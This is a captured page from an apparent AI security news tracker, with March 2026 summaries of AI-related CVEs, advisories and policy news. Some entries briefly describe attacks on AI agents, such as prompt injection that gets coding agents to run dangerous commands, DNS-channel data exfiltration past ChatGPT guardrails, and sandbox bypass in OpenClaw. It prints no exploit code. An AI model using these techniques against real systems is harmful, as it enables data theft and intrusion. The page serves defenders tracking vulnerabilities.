aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,678
[LAST_24H]
24
[LAST_7D]
166
Daily BriefingMonday, March 30, 2026
>

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)

Latest Intel

page 66/268
VIEW ALL
01

Iran war heralds era of AI-powered bombing quicker than ‘speed of thought’

safetypolicy
Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).

>

ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.

Mar 3, 2026

The US military reportedly used Anthropic's Claude AI model to help plan attacks on Iran, enabling bombing campaigns faster than human decision-making can occur by shortening the "kill chain" (the process from identifying a target to getting legal approval and launching a strike). Experts worry this technology could push human decision-makers out of the loop entirely.

The Guardian Technology
02

OpenAI's Altman admits defense deal was 'opportunistic and sloppy' amid backlash

policy
Mar 2, 2026

OpenAI CEO Sam Altman acknowledged that the company rushed into a deal with the U.S. Department of Defense, calling it "opportunistic and sloppy," after public backlash over the timing and terms. The company plans to amend the contract to add safeguards, including language stating that "the AI system shall not be intentionally used for domestic surveillance of U.S. persons and nationals," and will work with the Pentagon on technical protections for their AI tools.

Fix: OpenAI will amend the contract to include new language stating that "the AI system shall not be intentionally used for domestic surveillance of U.S. persons and nationals." The company also stated it would work with the Pentagon on technical safeguards, and Altman affirmed that the Defense Department had confirmed OpenAI's tools would not be used by intelligence agencies such as the NSA.

CNBC Technology
03

GHSA-6g25-pc82-vfwp: OpenClaw: macOS beta onboarding exposed PKCE verifier via OAuth state

security
Mar 2, 2026

The OpenClaw macOS beta onboarding flow had a security flaw where it exposed a PKCE code_verifier (a secret token used in OAuth, a system for secure login) by putting it in the OAuth state parameter, which could be seen in URLs. This vulnerability only affected the macOS beta app's login process, not other parts of the software.

Fix: OpenClaw removed Anthropic OAuth sign-in from macOS onboarding and replaced it with setup-token-only authentication. The fix is available in patched version 2026.2.25.

GitHub Advisory Database
04

CVE-2026-1336: The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access and m

security
Mar 2, 2026

A WordPress plugin called 'AI ChatBot with ChatGPT and Content Generator by AYS' has a security flaw in versions up to 2.7.5 where missing authorization checks (verification that a user has permission to perform an action) allow attackers without accounts to view, modify, or delete the plugin's ChatGPT API key (a secret code needed to use OpenAI's service). The vulnerability was partially fixed in version 2.7.5 and fully fixed in version 2.7.6.

Fix: Update the plugin to version 2.7.6 or later, where the vulnerability was fully fixed.

NVD/CVE Database
05

CyberStrikeAI tool adopted by hackers for AI-powered attacks

security
Mar 2, 2026

Hackers are using CyberStrikeAI, an open-source AI security testing platform, to automate attacks against network devices like firewalls. The tool combines over 100 security utilities with an AI decision engine (compatible with GPT, Claude, and DeepSeek models) to automatically scan networks, find vulnerabilities, and execute attacks with minimal hacker skill required. Researchers warn this represents a growing threat as adversaries adopt AI-powered orchestration engines (systems that coordinate multiple tools automatically) to target exposed network equipment.

BleepingComputer
06

ChatGPT uninstalls surged by 295% after DoD deal

policy
Mar 2, 2026

ChatGPT's mobile app uninstalls surged 295% after OpenAI announced a partnership with the U.S. Department of Defense, while competitor Anthropic's Claude app saw downloads jump 37-51% after publicly declining a similar defense partnership over concerns about AI being used for surveillance and autonomous weapons. The shift in user preference was reflected in app store rankings, with Claude reaching the number one position and ChatGPT receiving a sharp increase in negative reviews.

TechCrunch
07

GHSA-943q-mwmv-hhvh: OpenClaw: Gateway /tools/invoke tool escalation + ACP permission auto-approval

security
Mar 2, 2026

OpenClaw Gateway had two security flaws that could let an attacker with a valid token escalate their access: the HTTP endpoint (`POST /tools/invoke`, a web interface for running tools) didn't block dangerous tools like session spawning by default, and the permission system could auto-approve risky operations without enough user confirmation. Together, these could allow an attacker to execute commands or control sessions if they reach the Gateway.

Fix: Update to OpenClaw version 2026.2.14 or later. The fix includes: denying high-risk tools over HTTP by default (with configuration overrides available via `gateway.tools.{allow,deny}`), requiring explicit prompts for any non-read/search permissions in the ACP (access control permission) system, adding security warnings when high-risk tools are re-enabled, and making permission matching stricter to prevent accidental auto-approvals. Additionally, keep the Gateway loopback-only (only accessible locally) by setting `gateway.bind="loopback"` or using `openclaw gateway run --bind loopback`, and avoid exposing it directly to the internet without using an SSH tunnel or Tailscale.

GitHub Advisory Database
08

Stripe wants to turn your AI costs into a profit center

industry
Mar 2, 2026

Stripe released a preview feature that helps AI startups automatically bill their customers for AI model usage (tokens, which are units of text that AI models process) and add a profit margin on top of the underlying costs. For example, a startup can charge customers 30% more than what it pays to access models from providers like OpenAI or Google, with Stripe automating the tracking and billing process across multiple AI models and third-party gateways.

TechCrunch
09

No one has a good plan for how AI companies should work with the government

policy
Mar 2, 2026

OpenAI won a Pentagon contract that Anthropic refused, sparking public backlash over concerns about the company's involvement in mass surveillance and automated weaponry. The situation highlights that as AI companies become part of national security infrastructure, neither the companies nor the government appear ready to manage the ethical and policy challenges this creates, particularly around who should have power over these decisions.

TechCrunch
10

Critical OpenClaw Vulnerability Exposes AI Agent Risks

security
Mar 2, 2026

A critical vulnerability in OpenClaw, a popular AI tool used by developers, has been discovered and patched. The flaw is part of a pattern of security problems affecting this rapidly-adopted AI agent (a software system that can perform tasks autonomously).

Fix: The vulnerability has been patched. No specific version number or patching instructions are provided in the source text.

Dark Reading
Prev1...6465666768...268Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026